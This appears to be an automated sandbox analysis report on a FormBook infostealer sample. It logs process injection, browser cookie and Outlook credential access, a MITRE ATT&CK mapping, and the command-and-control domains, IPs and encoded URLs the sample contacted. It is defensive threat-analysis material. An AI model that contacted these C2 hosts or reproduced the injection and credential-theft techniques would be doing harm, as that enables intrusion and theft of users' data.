                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 1260Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\mobsync.exeThread APC queued: target process: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3003008Jump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008187B1 LogonUserW,0_2_008187B1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007C3B3A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007C48D7
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00824C27 mouse_event,0_2_00824C27
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"Jump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00817CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00817CAF
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0081874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0081874B
                Source: YH-3-12-2024-GDL Units - Projects.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: YH-3-12-2024-GDL Units - Projects.exe, zZyhwwvEVl.exe, 00000002.00000000.1788080502.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3503053278.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000000.1937216973.0000000001AD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: zZyhwwvEVl.exe, 00000002.00000000.1788080502.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3503053278.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000000.1937216973.0000000001AD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: zZyhwwvEVl.exe, 00000002.00000000.1788080502.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3503053278.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000000.1937216973.0000000001AD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: zZyhwwvEVl.exe, 00000002.00000000.1788080502.0000000001AA0000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3503053278.0000000001AA1000.00000002.00000001.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000000.1937216973.0000000001AD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E862B cpuid 0_2_007E862B
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007F4E87
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00801E06 GetUserNameW,0_2_00801E06
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007F3F3A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007C49A0
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668432399.000000000108A000.00000004.00000020.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668419174.000000000107A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: YH-3-12-2024-GDL Units - Projects.exeBinary or memory string: WIN_81
                Source: YH-3-12-2024-GDL Units - Projects.exeBinary or memory string: WIN_XP
                Source: YH-3-12-2024-GDL Units - Projects.exeBinary or memory string: WIN_XPe
                Source: YH-3-12-2024-GDL Units - Projects.exeBinary or memory string: WIN_VISTA
                Source: YH-3-12-2024-GDL Units - Projects.exeBinary or memory string: WIN_7
                Source: YH-3-12-2024-GDL Units - Projects.exeBinary or memory string: WIN_8
                Source: YH-3-12-2024-GDL Units - Projects.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00836283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00836283
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00836747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00836747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets261
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567130 Sample: YH-3-12-2024-GDL Units - Pr... Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 28 www.logidant.xyz 2->28 30 www.tals.xyz 2->30 32 11 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 YH-3-12-2024-GDL Units - Projects.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 Maps a DLL or memory area into another process 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 zZyhwwvEVl.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 mobsync.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 zZyhwwvEVl.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 logidant.xyz 45.141.156.114, 49878, 49885, 49892 YURTEH-ASUA Germany 22->34 36 aballanet.cat 134.0.14.158, 49737, 49738, 49739 CDMONsistemescdmoncomES Spain 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                YH-3-12-2024-GDL Units - Projects.exe32%ReversingLabsWin32.Trojan.AutoitInject
                YH-3-12-2024-GDL Units - Projects.exe33%VirustotalBrowse
                YH-3-12-2024-GDL Units - Projects.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                logidant.xyz11%VirustotalBrowse
                www.yunlekeji.top1%VirustotalBrowse
                aballanet.cat0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.aballanet.cat/6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO100%Avira URL Cloudmalware
                http://www.zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLO0%Avira URL Cloudsafe
                http://www.yunlekeji.top/t322/?rfJh=FCfXCbowRdQKA3bJwmXvc8lOOpkaFxffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR69fnaXkcIGP7N+ZF5LcImJ8BAL5CR7GLvE=&O258-=pHdHBdXhwLO0%Avira URL Cloudsafe
                http://www.logidant.xyz/iuvu/0%Avira URL Cloudsafe
                http://www.tals.xyz/k1td/?rfJh=oEMxw+ab8QlEZmTlDbCKptskN0q9+wMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCTBaIFjRaD0WqdXDHZ0BQI5kG8sOnP1u2RJI=&O258-=pHdHBdXhwLO0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/kf1m/0%Avira URL Cloudsafe
                http://www.tals.xyz/k1td/0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/0%Avira URL Cloudsafe
                http://www.brightvision.website0%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN4/hgDK7ji4WzdcK25sZRimZDxLZaBEcPhbk=&O258-=pHdHBdXhwLO0%Avira URL Cloudsafe
                http://www.laohub10.net/36be/0%Avira URL Cloudsafe
                http://www.thinkphp.cn0%Avira URL Cloudsafe
                http://www.aballanet.cat/6xrr/100%Avira URL Cloudmalware
                http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5a100%Avira URL Cloudmalware
                http://www.brightvision.website/gn26/?rfJh=fgpTVhEuh+HnR3p3mfMFhWHWnuNeMM4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9KgaN0dmEc5ka6rkf4Wz0wYWqHeygGDkXS8=&O258-=pHdHBdXhwLO0%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY50%Avira URL Cloudsafe
                http://www.izmirescortg.xyz/lnl7/?rfJh=kAPJ1zL1a1XedmcoetGOcXX+BQ0sya6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZSqhyZMy+6OBPTB2cT6zQPdPsX8z060ybXY=&O258-=pHdHBdXhwLO0%Avira URL Cloudsafe
                http://www.laohub10.net/36be/?O258-=pHdHBdXhwLO&rfJh=zT+fCPSXWqCfWPgPkoP8augIhoSODsGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rERMucz0ZFCszNnC27qzdt1he7kDJbjieX8=0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/?rfJh=dyqW0%Avira URL Cloudsafe
                http://www.brightvision.website/gn26/0%Avira URL Cloudsafe
                http://www.logidant.xyz/iuvu/?rfJh=4GSi4NjhieA+eby3OKR9UHmAChFha0TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yneyjQ3W+H8Nz5kvkADuxuBf3arJIsYCs9inQ=&O258-=pHdHBdXhwLO0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/?rfJh=dyqW+SkpLS8uL5dSny8q8PjeDBZe49z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRpkPLcScFLLxAHuiMJY3F0pG7ioCFxuNP/M=&O258-=pHdHBdXhwLO0%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/0%Avira URL Cloudsafe
                http://www.yunlekeji.top/t322/0%Avira URL Cloudsafe
                https://zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I30%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.izmirescortg.xyz
                		104.21.36.62
                		truefalse
                  		high
                  www.brightvision.website
                  		203.161.42.73
                  		truefalse
                    		unknown
                    www.madhf.tech
                    		103.224.182.242
                    		truefalse
                      		high
                      r0lqcud7.nbnnn.xyz
                      		23.225.159.42
                      		truefalse
                        		high
                        logidant.xyz
                        		45.141.156.114
                        		truetrueunknown
                        www.yunlekeji.top
                        		106.15.109.33
                        		truefalseunknown
                        www.tals.xyz
                        		13.248.169.48
                        		truefalse
                          		high
                          www.zkdamdjj.shop
                          		172.67.187.114
                          		truefalse
                            		high
                            www.canadavinreport.site
                            		185.27.134.206
                            		truefalse
                              		high
                              aballanet.cat
                              		134.0.14.158
                              		truetrueunknown
                              www.logidant.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.laohub10.net
                                		unknown
                                		unknownfalse
                                  		high
                                  www.aballanet.cat
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.aballanet.cat/6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLOtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.canadavinreport.site/g3h7/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.yunlekeji.top/t322/?rfJh=FCfXCbowRdQKA3bJwmXvc8lOOpkaFxffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR69fnaXkcIGP7N+ZF5LcImJ8BAL5CR7GLvE=&O258-=pHdHBdXhwLOfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXIiiXeZyn2c+rOjHayKJI+/jeoNtslqItL4=&O258-=pHdHBdXhwLOfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tals.xyz/k1td/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.logidant.xyz/iuvu/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.zkdamdjj.shop/kf1m/false
                                    • Avira URL Cloud: safe
                                    		unknown
